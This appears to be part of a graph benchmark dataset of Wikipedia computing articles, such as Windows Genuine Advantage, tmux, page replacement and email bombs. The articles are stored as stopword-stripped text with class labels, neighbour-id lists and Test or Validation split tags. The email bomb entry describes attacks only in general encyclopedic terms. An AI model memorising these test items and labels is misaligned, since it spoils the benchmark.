microsoft announced lawsuits allegedly distributing unauthorized copies windows edirectsoftware montana chicago-area resellers nathan ballog easy computers personal firewalls though one embedded windows may alert method wgatray.exe started case outpost firewall identified hidden process wgatray.exe process firewall blocked without apparent problems tool released firewall vendor prevent wga notifications transmitting information one pc windows genuine advantage microsoft collects following data october 20 2008 many users windows xp china received black desktop microsoft introduced wga system chinese language systems effort combat copyright violation extremely common china since majority users china run unlicensed copy windows many users experienced described black screen syndrome operating system changes desktop background black screen well displays constant warning messages users even reported disabling office programs microsoft word powerpoint outlook according various polls carried chinese portals sohu.com qq.com 21cn.com many others large number 60 surveyed chinese internet users hostile microsoft windows genuine advantage wga office genuine advantage oga even wga really make program unusable updates except critical ones downloaded microsoft rather disallowing updating windows vista originally ran reduced-functionality mode found wga compromised made people compare wga time bomb software windows vista sp2 removed behavior reverted nag-only methods windows xp notification tool accused spyware-like behavior phoning home daily basis microsoft subsequently admitted behaviour denied amounted spyware following pressure microsoft announced future tool would phone home every two weeks instead every day microsoft also provided removal instructions pilot version wga despite microsoft sued anti-spyware statutes wga non-disclosed phone home behaviour lawsuit since dismissed wga program produce false positives incorrectly identifying genuine copy windows genuine happen number reasons failed updates etc microsoft established forum help users encountering problems february 2007 sure section added program case incorrect reading according ars technica editorial wga reported around 22 500 million windows computers failing test less 0.5 due unauthorized software balance 20 90 positives related edge cases microsoft refused comment rate pure false positives beyond saying 1 stated around 5 million users affected june 18 2007 news surfaced possible positively validate genuine microsoft product user result able download certain software microsoft official website using internet explorer ies4linux wine running linux without even windows-family system installed october 5 2006 wga failure occurred incorrectly flagging systems non-genuine august 25 2007 microsoft wga servers suffered outage resulting many legitimate copies windows xp vista marked counterfeit issue solved 12 hours later according microsoft fewer 12,000 systems affected worldwide july 18 2008 reports microsoft wga oga servers offline surfaced microsoft later responded offline verification temporarily
[ 5643, 4624, 537, 540, 3102, 9762, 8227, 8740, 10281, 8753, 2101, 10812, 3648, 7754, 10828, 4173, 4174, 9808, 10839, 603, 9819, 8797, 1632, 3170, 622, 9839, 4210, 7796, 7290, 4731, 10879, 8328, 8841, 6797, 2193, 9874, 10900, 4248, 10392, 7...
Test
2,245
2
Tmux:tmux tmux terminal multiplexer unix-like operating systems allows multiple terminal sessions accessed simultaneously single window useful running one command-line program time also used detach processes controlling terminals allowing ssh sessions remain active without visible tmux includes features gnu screen allows users start terminal session clients bound specific physical virtual console multiple terminal sessions created within single terminal session freely rebound one virtual console another session several connected clients tmux notable features tmux included openbsd available package many unix-like operating systems
[ 515, 5251, 9733, 9223, 3976, 521, 2825, 3465, 1932, 9735, 4750, 10631, 274, 7188, 5397, 2198, 7702, 8725, 10105, 6812, 7847, 4398, 6702, 7983, 9520, 1336, 7356, 965, 4423, 1993, 8522, 3659, 3404, 5067, 8778, 11086, 5970, 9946, 5084, 7139,...
Test
2,246
1
Composite_index_(database):composite index database database composite index multi-column index index based several columns
[ 10632, 8201, 8979, 2068, 10389, 7446, 2456, 1049, 5658, 5403, 9631, 9634, 4263, 2344, 7080, 10286, 9397, 3004, 10048, 5953, 9286, 2901, 10326, 987, 2780, 4065, 9828, 10471, 6124, 2669, 6383, 2544, 10737, 9075, 1146 ]
None
2,247
0
Word_lists_by_frequency:word lists frequency word lists frequency lists language words grouped frequency occurrence within given text corpus either levels ranked list serving purpose vocabulary acquisition word list frequency provides rational basis making sure learners get best return vocabulary learning effort mainly intended course writers directly learners frequency lists also made lexicographical purposes serving sort checklist ensure common words left major pitfalls corpus content corpus register definition word word counting thousand years old still gigantic analysis done hand mid-20th century natural language electronic processing large corpora movie subtitles subtlex megastudy accelerated research field computational linguistics frequency list sorted list words word types together frequency frequency usually means number occurrences given corpus rank derived position list nation noted incredible help provided computing capabilities making corpus analysis much easier cited several key issues influence construction frequency lists currently available studies based written text corpus easily available easy process however proposed tap large number subtitles available online analyse large numbers speeches made long critical evaluation traditional textual analysis approach support move written corpus toward oral corpuses analysis thanks open film subtitles available online recently followed handful follow-up studies providing valuable frequency count analysis various languages indeed subtlex movement completed five years full studies french american english dutch chinese spanish greek vietnamese brazil portuguese portugal portuguese 2015 albanian polish subtlex-it 2015 provides raw data case basic word unit defined latin scripts words usually one several characters separated either spaces punctuation exceptions arise english ca n't french aujourd'hui idioms may also preferable group words word family representation base word thus possible impossible possibility words word family represented base word *possib* statistical purpose words summed base word form *possib* allowing ranking concept form occurrence moreover languages may present specific difficulties case chinese use spaces words specified chain several characters interpreted either phrase unique-character words multi-character word seems zipf law holds frequency lists drawn longer texts natural language frequency lists useful tool building electronic dictionary prerequisite wide range applications computational linguistics german linguists define häufigkeitsklasse frequency class formula_1 item list using base 2 logarithm ratio frequency frequency frequent item common item belongs frequency class 0 zero item approximately half frequent belongs class 1 example list misspelled word outragious ratio 76/3789654 belongs class 16. formula_3 floor function frequency lists together semantic networks used identify least common specialized terms replaced hypernyms process semantic compression lists intended given directly students rather serve guideline teachers textbook authors paul nation modern language teaching summary encourages first move high frequency vocabulary special purposes thematic vocabulary low frequency vocabulary teach learners strategies sustain autonomous vocabulary expansion word frequency known various effects memorization positively affected higher word frequency likely learner subject exposures lexical access positively influenced high word frequency phenomenon called word frequency effect effect word frequency related effect age-of-acquisition age word learned review available resources word counting dates back hellenistic time thorndike lorge assisted colleagues counted 18,000,000 running words provide first large scale frequency list 1944 modern computers made projects far easier suffer age particular words relating technology blog 2014 7665 frequency corpus contemporary american english first attested 1999 appear three lists twb contains 30,000 lemmas ~13,000 word families goulden nation read 1990 corpus 18 million written words hand analysed size source corpus increased usefulness age language changes reduced applicability gsl contains 2,000 headwords divided two sets 1,000 words corpus 5 million written words analyzed 1940s rate occurrence different meanings parts speech headword provided various criteria frequence range carefully applied corpus thus despite age errors corpus entirely written text still excellent database word frequency frequency meanings reduction noise list updated 2013 dr. charles browne dr. brent culligan joseph phillips new general service list corpus 5 million running words written texts used united states schools various grades various subject areas value focus school teaching materials tagging words frequency word school grade subject areas contain 1 million words written corpus representing different dialects english sources used produce frequency lists review made attempt made 1950s–60s includes f.f.1 list 1,500 high-frequency words completed later f.f.2 list 1,700 mid-frequency words used syntax rules claimed 70 grammatical words constitute 50 communicatives sentence 3,680 words make 95~98 coverage list 3,000 frequent words available french ministry education also provide ranked list 1,500 frequent word families provided lexicologue étienne brunet jean baudot made study model american brown study entitled fréquences d'utilisation des mots en français écrit contemporain recently project lexique3 provides 142,000 french words orthography phonetic syllabation part speech gender number occurrence source corpus frequency rank associated lexemes etc. available open license cc-by-sa-4.0 lexique3 continuous study originate subtlex movement cited made completely new counting based online film subtitles several studies spanish word frequency chinese corpuses long studied perspective frequency lists historical way learn chinese vocabulary based characters frequency american sinologist john defrancis mentioned importance chinese foreign language learning teaching johnny ca n't read chinese frequency toolkit da taiwanese ministry education provided large databases frequency ranks characters words hsk list 8,848 high medium frequency words people republic china republic china taiwan top list 8,600 common traditional chinese words two lists displaying common chinese words characters following subtlex movement recently made rich study chinese word character frequencies frequently used words different languages based wikipedia combined corpora 100 frequently used french words example sentences based www.opensubtitles.org
[ 1890, 7780, 3694, 7599, 10102, 2999 ]
Test
2,248
2
Atlas_Supervisor:atlas supervisor atlas supervisor program managed allocation processing resources manchester university atlas computer machine able act many tasks user programs concurrently various functions included running atlas computer virtual memory atlas supervisor paper section 3 store organisation ‘ considered many first recognisable modern operating system ’ brinch hansen described significant breakthrough history operating systems
[ 2179, 10499, 10883, 394, 3978, 1804, 6797, 273, 7057, 6675, 7187, 11539, 9366, 11667, 6296, 25, 10776, 8092, 4637, 7325, 9887, 10016, 9762, 421, 5158, 10235, 2345, 557, 7983, 3248, 7217, 11184, 6837, 823, 9784, 4409, 10809, 6075, 7483, 60...
Test
2,249
3
Ys_I:_Ancient_Ys_Vanished:ys ancient ys vanished ys vanished omens also ancient land ys first installment ys action role-playing video game series developed nihon falcom 1987 name commonly misspelled due error packaging english-language release initially developed pc-8801 masaya hashimoto director programmer designer tomoyoshi miyazaki scenario writer game soon ported x1 pc-9801 fm-7 msx2 japanese computer systems ancient ys vanished saw many subsequent releases english-language version master system enhanced remake turbografx-cd system part compilation called ys ii along 1988 sequel ys precursor rpgs emphasize storytelling hero ys adventurous young swordsman named adol christin story begins arrived town minea land esteria called upon sara fortune teller tells great evil sweeping land adol informed must seek six books ys books contain history ancient land ys give knowledge needs defeat evil forces sara gives adol crystal identification instructs find aunt zepik village holds key retrieving one books quest begins player controls adol game field viewed top-down perspective travels main field explores dungeons encounters numerous roaming enemies must battle order progress combat ys rather different rpgs time either turn-based battles manually activated sword ys instead features battle system fighters automatically attack walking enemies off-center one fighter comes contact enemy damage could sustained sides combatants facing attacking straight causes attacker damage clipping edge defender causes attacked fighter take damage one fighter contacts enemy side back attacked fighter sustain damage combat system created accessibility mind 'bump attack system become one series defining features falcom staff compared style gameplay enjoyment popping air bubble sheets sense took tedious task level-grinding turned something similar high-score-based arcade game according games john szczepaniak retro gamer escapist repetition act pleasurable developed psychological rhythm even event backtracking progress always swift since player never needed stop moving another feature used nearly every ys title since original recharging health mechanism previously used dragon slayer ys official successor clone hydlide series although hydlide borrowed feature 1980 game rogue first place recharging health since become common mechanism used many video games today aside graphical differences game layout remains essentially across many ports ys however versions details changed sega master system version example saw game dungeon areas flipped horizontally including minor differences distinctive early ports famicom edition published victor musical industries version vast departure original featuring entirely new layouts towns field dungeons replacement number original musical tracks new final battle sequence version developed msx2 contained handful new musical tracks replaced part original game soundtrack tracks along number unused tracks first composed original later incorporated soundtrack ys eternal ys complete versions developed turbografx-cd released ys ii 1989 included additional cutscenes opening detailing adol arrival town minea microsoft windows-based remakes ys eternal ys complete expand many story elements cutscenes additional gameplay sharp x68000 enhanced remake released 1991 notable early use 3d pre-rendering boss sprites however ended creating considered bizarre contrast game mostly 2d graphics composed yuzo koshiro along mieko ishikawa soundtrack notable rich melodies age video game music beginning progress monotonous bleeps ys soundtrack considered best video game music ever composed considered one finest influential role-playing video game scores time several soundtrack albums dedicated music ys released falcom includes sega master system version ys reviewed march 1989 issue computer video games magazine gave game score 92 stating best graphics system offers depth playability keep engrossed weeks games machine compared game legend zelda stating many respects character detail all-round presentation make better game visually concludes ys one top-rank rpgs around giving score 90 computer gaming world scorpia 1993 called computer version ys fairly simple entry puzzles solve ... interesting mainly seeing japanese terms lightweight crpgs japanese gaming magazine famitsu gave famicom nes version game score 30 40 famitsu also gave pce-cd turbografx-cd version score 35 40
[ 10240, 6797, 9166, 6077, 10931, 11443, 445 ]
None
2,250
2
Page_replacement_algorithm:page replacement algorithm computer operating system uses paging virtual memory management page replacement algorithms decide memory pages page sometimes called swap write disk page memory needs allocated page replacement happens requested page memory page fault free page used satisfy allocation either none number free pages lower threshold page selected replacement paged referenced paged read disk involves waiting i/o completion determines quality page replacement algorithm less time waiting page-ins better algorithm page replacement algorithm looks limited information accesses pages provided hardware tries guess pages replaced minimize total number page misses balancing costs primary storage processor time algorithm page replacing problem typical online problem competitive analysis perspective sense optimal deterministic algorithm known page replacement algorithms hot topic research debate 1960s 1970s mostly ended development sophisticated lru least recently used approximations working set algorithms since basic assumptions made traditional page replacement algorithms invalidated resulting revival research particular following trends behavior underlying hardware user-level software affected performance page replacement algorithms requirements page replacement algorithms changed due differences operating system kernel architectures particular modern os kernels unified virtual memory file system caches requiring page replacement algorithm select page among pages user program virtual address spaces cached files latter pages specific properties example locked write ordering requirements imposed journaling moreover goal page replacement minimize total time waiting memory take account memory requirements imposed kernel sub-systems allocate memory result page replacement modern kernels linux freebsd solaris tends work level general purpose kernel memory allocator rather higher level virtual memory subsystem replacement algorithms local global process incurs page fault local page replacement algorithm selects replacement page belongs process group processes sharing memory partition global replacement algorithm free select page memory local page replacement assumes form memory partitioning determines many pages assigned given process group processes popular forms partitioning fixed partitioning balanced set algorithms based working set model advantage local page replacement scalability process handle page faults independently leading consistent performance process however global page replacement efficient overall system basis replacement algorithms simply return target page result means target page dirty contains data written stable storage page reclaimed i/o initiated send page stable storage clean page early days virtual memory time spent cleaning much concern virtual memory first implemented systems full duplex channels stable storage cleaning customarily overlapped paging contemporary commodity hardware hand support full duplex transfers cleaning target pages becomes issue deal situation various precleaning policies implemented precleaning mechanism starts i/o dirty pages likely replaced soon idea time precleaned page actually selected replacement i/o complete page clean precleaning assumes possible identify pages replaced next precleaning eager waste i/o bandwidth writing pages manage get re-dirtied selected replacement systems use demand paging—waiting page actually requested loading ram systems attempt reduce latency guessing pages ram likely needed soon pre-loading pages ram page requested often combination pre-cleaning guesses pages currently ram likely needed soon pre-writing storage page fault occurs anticipatory paging systems bring referenced page also next consecutive pages analogous prefetch input queue cpu swap prefetch mechanism goes even loading pages even consecutive likely needed soon h k -paging problem generalization model paging problem let h k positive integers formula_1 measure performance algorithm cache size formula_1 relative theoretically optimal page replacement algorithm formula_3 provide optimal page replacement algorithm strictly less resource h k -paging problem way measure online algorithm performs comparing performance optimal algorithm specifically separately parameterizing cache size online algorithm optimal algorithm marking algorithms general class paging algorithms page associate bit called mark initially set pages unmarked stage page requests mark page first requested stage marking algorithm algorithm never pages marked page alg marking algorithm cache size k opt optimal algorithm cache size h formula_1 alg formula_5-competitive every marking algorithm attains formula_5-competitive ratio lru marking algorithm fifo marking algorithm algorithm conservative consecutive request sequence containing k fewer distinct page references algorithm incur k fewer page faults alg conservative algorithm cache size k opt optimal algorithm cache formula_1 alg formula_5-competitive every conservative algorithm attains formula_5-competitive ratio lru fifo clock conservative algorithms variety page replacement algorithms theoretically optimal page replacement algorithm also known opt clairvoyant replacement algorithm bélády optimal page replacement policy algorithm works follows page needs swapped operating system swaps page whose next use occur farthest future example page going used next 6 seconds swapped page going used within next 0.4 seconds algorithm implemented general purpose operating system impossible compute reliably long page going used except software run system either known beforehand amenable static analysis memory reference patterns class applications allowing run-time analysis despite limitation algorithms exist offer near-optimal performance — operating system keeps track pages referenced program uses data decide pages swap subsequent runs algorithm offer near-optimal performance first run program program memory reference pattern relatively consistent time runs analysis paging problem also done field online algorithms efficiency randomized online algorithms paging problem measured using amortized analysis recently used nru page replacement algorithm algorithm favours keeping pages memory recently used algorithm works following principle page referenced referenced bit set page marking referenced similarly page modified written modified bit set setting bits usually done hardware although possible software level well certain fixed time interval timer interrupt triggers clears referenced bit pages pages referenced within current timer interval marked referenced bit page needs replaced operating system divides pages four classes although seem possible page modified yet referenced happens class 3 page referenced bit cleared timer interrupt nru algorithm picks random page lowest category removal four page categories nru algorithm replace not-referenced not-modified page page exists note algorithm implies modified not-referenced within last timer interval page less important not-modified page intensely referenced nru marking algorithm formula_5-competitive simplest page-replacement algorithm fifo algorithm first-in first-out fifo page replacement algorithm low-overhead algorithm requires little bookkeeping part operating system idea obvious name – operating system keeps track pages memory queue recent arrival back oldest arrival front page needs replaced page front queue oldest page selected fifo cheap intuitive performs poorly practical application thus rarely used unmodified form algorithm experiences bélády anomaly simple words page fault frame memory longest replaced fifo page replacement algorithm used vax/vms operating system modifications partial second chance provided skipping limited number entries valid translation table references additionally pages displaced process working set systemwide pool recovered already re-used fifo conservative algorithm formula_5-competitive modified form fifo page replacement algorithm known second-chance page replacement algorithm fares relatively better fifo little cost improvement works looking front queue fifo instead immediately paging page checks see referenced bit set set page swapped otherwise referenced bit cleared page inserted back queue new page process repeated also thought circular queue pages referenced bit set second encounter first page list page swapped referenced bit cleared pages reference bit cleared second chance algorithm degenerates pure fifo name suggests second-chance gives every page second-chance – old page referenced probably use swapped new page referenced clock efficient version fifo second-chance pages n't constantly pushed back list performs general function second-chance clock algorithm keeps circular list pages memory hand iterator pointing last examined page frame list page fault occurs empty frames exist r referenced bit inspected hand location r 0 new page put place page hand points hand advanced one position otherwise r bit cleared clock hand incremented process repeated page replaced clock conservative algorithm formula_5-competitive least recently used lru page replacement algorithm though similar name nru differs fact lru keeps track page usage short period time nru looks usage last clock interval lru works idea pages heavily used past instructions likely used heavily next instructions lru provide near-optimal performance theory almost good adaptive replacement cache rather expensive implement practice implementation methods algorithm try reduce cost yet keep much performance possible expensive method linked list method uses linked list containing pages memory back list least recently used page front recently used page cost implementation lies fact items list moved every memory reference time-consuming process another method requires hardware support follows suppose hardware 64-bit counter incremented every instruction whenever page accessed acquires value equal counter time page access whenever page needs replaced operating system selects page lowest counter swaps implementation costs one may consider algorithms like follow similar lru offer cheaper implementations one important advantage lru algorithm amenable full statistical analysis proven example lru never result n-times page faults opt algorithm n proportional number pages managed pool hand lru weakness performance tends degenerate many quite common reference patterns example n pages lru pool application executing loop array n 1 pages cause page fault every access loops large arrays common much effort put modifying lru work better situations many proposed lru modifications try detect looping reference patterns switch suitable replacement algorithm like recently used mru comparison arc algorithms lru mq 2q lru-2 lrfu lirs found megiddo modha 2004 lru marking algorithm formula_5-competitive random replacement algorithm replaces random page memory eliminates overhead cost tracking page references usually fares better fifo looping memory references better lru although generally lru performs better practice os/390 uses global lru approximation falls back random replacement lru performance degenerates intel i860 processor used random replacement policy rhodehamel 1989 frequently used nfu page replacement algorithm requires counter every page one counter initially set 0 clock interval pages referenced within interval counter incremented 1 effect counters keep track frequently page used thus page lowest counter swapped necessary main problem nfu keeps track frequency use without regard time span use thus multi-pass compiler pages heavily used first pass needed second pass favoured pages comparably lightly used second pass higher frequency counters results poor performance common scenarios exist nfu perform similarly os boot-up thankfully similar better algorithm exists description follows frequently used page-replacement algorithm generates fewer page faults least recently used page replacement algorithm page table contains null pointer values aging algorithm descendant nfu algorithm modifications make aware time span use instead incrementing counters pages referenced putting equal emphasis page references regardless time reference counter page first shifted right divided 2 adding referenced bit left binary number instance page referenced bits 1,0,0,1,1,0 past 6 clock ticks referenced counter look like 10000000 01000000 00100000 10010000 11001000 01100100 page references closer present time impact page references long ago ensures pages referenced recently though less frequently referenced higher priority pages frequently referenced past thus page needs swapped page lowest counter chosen following python code simulates aging algorithm counters formula_14 initialized formula_15 updated described via formula_16 using arithmetic shift operators def simulateaging rs k rs 1,0,1,0,1,1 1,1,0,0,1,0 1,1,0,1,0,1 1,0,0,0,1,0 0,1,1,0,0,0 k 8 simulateaging rs k given example r-bits 6 pages 5 clock ticks function prints following output lists r-bits clock tick formula_17 individual counter values formula_14 page binary representation note aging differs lru sense aging keep track references latest 16/32 depending bit size processor integers time intervals consequently two pages may referenced counters 00000000 even though one page referenced 9 intervals ago 1000 intervals ago generally speaking knowing usage within past 16 intervals sufficient making good decision page swap thus aging offer near-optimal performance moderate price basic idea behind algorithm locality reference used lru difference ldf locality based distance used references ldf replace page longest distance current page two pages distance page next current page anti-clock rotation get replaced many techniques discussed assume presence reference bit associated page hardware bit efficient use requires techniques operate well without one one notable example vax hardware running openvms system knows page modified necessarily page read approach known secondary page caching pages removed working sets process-private memory generally placed special-purpose lists remaining physical memory time removing page working set technically page-replacement operation effectively identifies page candidate page whose backing store still valid whose contents dirty otherwise need preserved placed tail free page list page requires writing backing store placed modified page list actions typically triggered size free page list falls adjustable threshold pages may selected working set removal essentially random fashion expectation poor choice made future reference may retrieve page free modified list removed physical memory page referenced way removed free modified list placed back process working set modified page list additionally provides opportunity write pages backing store groups one page increasing efficiency pages placed free page list sequence pages works way head free page list resembles results lru nru mechanism overall effect similarities second-chance algorithm described earlier another example used linux kernel arm lack hardware functionality made providing two page tables – processor-native page tables neither referenced bits dirty bits software-maintained page tables required bits present emulated bits software-maintained table set page faults order get page faults clearing emulated bits second table revokes access rights corresponding page implemented altering native table working set process set pages expected used process time interval working set model n't page replacement algorithm strict sense actually kind medium-term scheduler
[ 2304, 3725, 11539, 3615, 2473, 7983, 823, 8379, 4928, 2625, 2250, 5967, 5840, 9300, 11604, 86, 10843, 1385, 8554, 9964, 9335, 2172, 7039 ]
Test
2,251
4
Email_bomb:email bomb internet usage email bomb form net abuse consisting sending large volumes email address attempt overflow mailbox overwhelm server email address hosted denial-of-service attack dos attack smoke screen distract attention important email messages indicating security breach three methods perpetrating email bomb mass mailing list linking zip bombing mass mailing consists sending numerous duplicate mails email address types mail bombs simple design extreme simplicity means easily detected spam filters email-bombing using mass mailing also commonly performed ddos attack employing use zombie botnets hierarchical networks computers compromised malware attacker control similar use spamming attacker instructs botnet send millions even billions emails unlike normal botnet spamming emails addressed one addresses attacker wishes flood form email bombing similar purpose ddos flooding attacks targets frequently dedicated hosts handling website email accounts business type attack devastating services host type attack difficult defend simple mass-mailing bomb multiple source addresses possibility zombie computer sending different message employing stealth techniques defeat spam filters list linking also known email cluster bomb means signing particular email address several email list subscriptions victim unsubscribe unwanted services manually attack carried automatically simple scripts easy almost impossible trace back perpetrator potentially destructive massive attack kind targeting .gov email addresses observed august 2016 order prevent type bombing email subscription services send confirmation email person inbox email used register subscription however even confirmation emails contribute attack better defense would prevent web sites exploited without abandoning subscription forms subscription form filled web site would dynamically create mailto link legitimate user would send message validate request without receiving email web site sender email could spoofed sender smtp ip address list manager therefore verify email form request matches originating smtp server validation message large amount confirmation emails initiated registration bots signing specific email address multitude services used distract view important emails indicating security breach happened elsewhere example amazon account hacked hacker may contrive flood confirmation emails sent email address associated account mask fact amazon shipment address changed purchases made hacker zip bomb variant mail-bombing commercial mail servers began checking mail anti-virus software filtering certain malicious file types exe rar zip 7-zip mail server software configured unpack archives check contents well new idea combat solution composing bomb consisting enormous text file containing example letter z repeating millions times file compresses relatively small archive unpacking especially early versions mail servers would use greater amount processing could result denial service zip .tar.gz file even contain copy causing infinite recursion server checks nested archive files text bomb similar variant sending large number text messages sms technique means cyberbullying online harassment apps online android operating system since banned means sending text bombs text messages may also lead high phone bill charges mobile plans additionally certain phone apps also created prevent text bombs android os
[ 8768, 9953, 2213, 2409, 855, 7515, 9053, 10110 ]
Test
2,252
4
Gateway_Anti-Virus:gateway anti-virus gateway anti-virus allows applications across enterprise check files viruses providing soap-based virus scanning web service client applications attach files soap messages submit gateway anti-virus web service web service uses clamav scan attachments viruses returns results client
[ 11363, 10020, 2213, 7983, 823 ]
Validation
2,253
3
Fork_(system_call):fork system call computing particularly context unix operating system workalikes fork operation whereby process creates copy usually system call implemented kernel fork primary historically method process creation unix-like operating systems multitasking operating systems processes running programs need way create new processes e.g run programs fork variants typically way unix-like systems process start execution different program first forks create copy copy called child process calls exec system call overlay program ceases execution former program favor fork operation creates separate address space child child process exact copy memory segments parent process modern unix variants follow virtual memory model sunos-4.0 copy-on-write semantics implemented physical memory need actually copied instead virtual memory pages processes may refer pages physical memory one writes page copied optimization important common case fork used conjunction exec execute new program typically child process performs small set actions ceases execution program favour program started requires parent data structures process calls fork deemed parent process newly created process child fork processes run program resume execution though called system call inspect call return value determine status child parent act accordingly one earliest references fork concept appeared multiprocessor system design melvin conway published 1962 conway paper motivated implementation l. peter deutsch fork genie time-sharing system concept borrowed ken thompson earliest appearance research unix fork later became standard interface posix child process starts copy parent file descriptors interprocess communication parent process often create pipe several pipes forking processes close ends pipes n't need vfork variant fork calling convention much semantics used restricted situations originated 3bsd version unix first unix support virtual memory standardized posix permitted vfork exactly behavior fork marked obsolescent 2004 edition replaced posix_spawn typically implemented via vfork subsequent editions vfork system call issued parent process suspended child process either completed execution replaced new executable image via one exec family system calls child borrows mmu setup parent memory pages shared among parent child process copying done particular copy-on-write semantics hence child process makes modification shared pages new page created modified pages visible parent process since absolutely page copying involved consuming additional memory technique optimization plain fork full-copy environments used exec posix using vfork purpose except prelude immediate call function exec family select operations gives rise undefined behavior vfork child borrows data structures rather copying vfork still faster fork uses copy write semantics system v support function call system vr4 introduced memory sharing causes error-prone similarly linux man page vfork strongly discourages use problems include deadlocks might occur multi-threaded programs due interactions dynamic linking replacement interface posix introduced family functions combine actions fork exec functions may implemented library routines terms done linux terms better performance done solaris posix specification notes designed kernel operations especially operating systems running constrained hardware real-time systems 4.4bsd implementation got rid vfork implementation causing vfork behavior fork later reinstated netbsd operating system performance reasons embedded operating systems uclinux omit fork implement vfork need operate devices copy-on-write impossible implement due lack mmu plan 9 operating system created designers unix includes fork also variant called rfork permits fine-grained sharing resources parent child processes including address space except stack segment unique process environment variables filesystem namespace makes unified interface creation processes threads within freebsd irix adopted rfork system call plan 9 latter renaming sproc clone system call linux kernel creates child process may share parts execution context parent like freebsd rfork irix sproc linux clone inspired plan 9 rfork used implement threads though application programmers typically use higher-level interface pthreads implemented top clone separate stacks feature plan 9 irix omitted according linus torvalds causes much overhead original design vms operating system 1977 copy operation subsequent mutation content specific addresses new process forking considered risky errors current process state may copied child process metaphor process spawning used component memory layout new process newly constructed scratch spawn metaphor later adopted microsoft operating systems 1993 posix-compatibility component vm/cms openextensions provides limited implementation fork parent suspended child executes child parent share address space essentially vfork labelled fork note applies cms guest operating system vm guest operating systems linux provide standard fork functionality following variant hello world program demonstrates mechanics system call c programming language program forks two processes deciding functionality perform based return value fork system call boilerplate code header inclusions omitted follows dissection program first statement calls system call split execution two processes return value recorded variable type posix type process identifiers pids minus one indicates error new process created error message printed successful two processes executing function point returned make processes perform different tasks program must branch return value determine whether executing child process parent process child process return value appears zero invalid process identifier child process prints desired greeting message exits technical reasons posix function must used instead c standard function process parent receives process identifier child always positive number parent process passes identifier system call suspend execution child exited happened parent resumes execution exits means statement
[ 5120, 8975, 11539, 5397, 8344, 6813, 3746, 7847, 10796, 5040, 2995, 7347, 823, 9151, 9153, 8773, 4423, 6352, 10835, 213, 11351, 5598, 6369, 8293, 4968, 7018, 5492, 5748, 2045 ]
None
2,254
7
Moab_Cluster_Suite:moab cluster suite moab cluster suite cluster workload management package available adaptive computing inc. integrates scheduling managing monitoring reporting cluster workloads moab cluster suite simplifies unifies management across one multiple hardware operating system storage network license resource manager environments moab development based open source maui cluster scheduler job scheduling package maui associated maui scheduler molokini edition developed project sourceforge site independent original maui scheduler moab feature set expanded greatly since divergence maui many new capabilities comparison list available adaptive computing enterprises inc. site
[ 3449 ]
Test
2,255
2
Kernel_marker:kernel marker kernel markers static kernel instrumentation support mechanism linux kernel source code allowing special tools lttng systemtap trace information exposed probe points kernel markers declared kernel code one-liners form name marker unique name format_string describes remaining arguments types marker depending whether probe connected code wants hook trace point first calls register probe callback marker point pdata private data value code wants pass probe later probe turned using using markers negligible overhead thanks part immediate values another support mechanism embeds switches code dynamically turned without using memory reference thus saving cache lines initial motivation create static instrumentation infrastructure large performance overhead induced predating dynamic instrumentation mechanism kprobe mechanism depends breakpoints static instrumentation also easily survive source code changes markers source code kernel markers consisted essentially c preprocessing macro added instrumented function branch function call neither stack setup function call executed instrumentation enabled identifying branch executing stack setup function call unlikely using gcc built-in expect hint given compiler position tracing instructions away cache lines involved standard kernel execution two kernel markers drawbacks identified led replacement tracepoints patch-set implementing merged version 2.6.24 released january 24 2008 address issues regarding kernel markers mathieu desnoyers original author implemented simpler type-safe version static probe points named tracepoints patch-set implementing tracepoints merged version 2.6.28 released december 25 2008 starting kernel markers slowly removed kernel sources eventually fully removed linux kernel 2.6.32 released december 3 2009
[ 1952, 5222, 6988, 5040, 2045, 9374 ]
Test
2,256
9
LR-attributed_grammar:lr-attributed grammar lr-attributed grammars special type attribute grammars allow attributes evaluated lr parsing result attribute evaluation lr-attributed grammars incorporated conveniently bottom-up parsing zyacc based lr-attributed grammars subset l-attributed grammars attributes evaluated one left-to-right traversal abstract syntax tree superset s-attributed grammars allow synthesized attributes yacc common hack use global variables simulate kind inherited attributes thus lr-attribution
[ 2144, 7634, 2307, 2086 ]
Test
2,257
4
Spy_Sweeper:spy sweeper spy sweeper software product detects removes spyware viruses optional anti-virus component installed personal computers microsoft windows webroot software webroot discontinued support spy sweeper 12/31/2012 spy sweeper examines files computer hard disk drive well objects memory windows registry cookies quarantines suspicious objects finds normally purchased yearly subscription broadband services msn premium also offer rebranded versions spy sweeper part subscription webroot offers two versions spy sweeper zero-cost 'spy scan offering real-time protection spyware full version allows removal spyware licenses full version cost around us 30 used one year one computer 40 two years webroot also sells multiple-license subscriptions allowing users install product multiple computers using single subscription purchasing either single-user three-machine enterprise licenses kevin thomas identical twin brother steven thomas founder webroot software invented idea spy sweeper behind scenes kevin thomas richard koontz webroots ace programmer worked hard developing spy sweeper despite odds ceo time david moll richard working home hours finished spy sweeper initial version finally released september 2004 time neither kevin thomas richard koontz ever received credit invention spy sweeper october 2006 webroot released spy sweeper antivirus includes removal protection computer viruses anti-virus component based anti-virus product made software vendor sophos june 2007 version 5.5 released included ability scan email attachments improved user interface windows 2000 users upgrade v5.5 october 2008 version 6.0 released product many awards press first anti-spyware product receive checkmark certification testing company west coast labs also received editor choice award pc magazine best buy award pc world spy sweeper known webroot secure anywhere
[ 10496, 6797, 7983, 9713, 8724, 9055, 4247, 10392, 7739, 3739, 8703 ]
None
2,258
2
HP_TouchPad:hp touchpad hp touchpad tablet computer developed designed hewlett-packard hp touchpad launched july 1 2011 united states july 15 canada united kingdom france germany august 15 australia august 18 2011 49 days touchpad launched united states hp announced would discontinue current devices running webos remaining touchpad stock received substantial price reductions quickly sold hp touchpad announced february 9 2011 webos think beyond event held fort mason center san francisco alongside hp veer hp pre 3 initial sales device sold 25,000 270,000 units meet hp expectations rapidly becoming overshadowed launch ipad 2 march august 16 2011 reported best buy refused pay hp touchpad stock europe touchpad estimated sold 12,000 first month release australia harvey norman exclusive retailer sold 1,200 units four days sale industry commentators suggested lack apps platform lackluster advertising hindering sales august 18 hp announced would discontinue webos devices hp cto shane robison noted touchpad half generation generation behind ipad n't going drive volume years later member development team described device made cast-off reject ipad parts august 19 2011 hp announced substantial price drop touchpad canada usa price 99 16gb model 149 32gb model quickly sold large numbers buyers acquired touchpad firesale prices brick-and-mortar retailers reportedly sold entire inventories within hours morning august 20 online retailers including barnes noble amazon.com best buy took orders august 22 rapidly exceeded inventory forced cancel many orders similar sale held australian harvey norman stores several stores selling inventory within hour similar sales took place uk several stores reducing prices £89 16gb £115 32gb hp touchpad became tablet highest approval rating hp touchpad stock immediately sold domestically overseas consumers rushing take advantage price 